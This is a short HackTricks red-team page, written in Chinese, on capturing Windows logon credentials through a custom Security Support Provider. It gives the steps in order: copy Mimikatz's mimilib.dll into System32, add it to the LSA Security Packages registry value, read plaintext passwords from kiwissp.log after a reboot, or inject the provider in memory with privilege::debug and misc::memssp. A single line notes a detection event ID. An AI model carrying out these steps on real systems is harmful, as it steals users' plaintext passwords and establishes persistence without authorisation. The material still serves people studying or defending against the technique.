Custom SSP
Reading time: 3 minutes
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。
Custom SSP
了解什么是 SSP (Security Support Provider) 在这里。
您可以创建您自己的 SSP来捕获以明文形式使用的凭据以访问机器。
Mimilib
您可以使用 Mimikatz 提供的 mimilib.dll
二进制文件。这将把所有凭据以明文记录在一个文件中。
将 dll 放入 C:\Windows\System32\
获取现有 LSA 安全包的列表:
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
将 mimilib.dll
添加到安全支持提供程序列表(安全包):
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
在重启后,所有凭据可以在 C:\Windows\System32\kiwissp.log
中以明文形式找到。
在内存中
您还可以直接使用 Mimikatz 在内存中注入此内容(请注意,这可能有点不稳定/无法工作):
privilege::debug
misc::memssp
这不会在重启后存活。
缓解措施
事件 ID 4657 - 审计创建/更改 HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
tip
学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)
学习和实践 Azure 黑客技术:
HackTricks Training Azure Red Team Expert (AzRTE)
支持 HackTricks
- 查看 订阅计划!
- 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
- 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。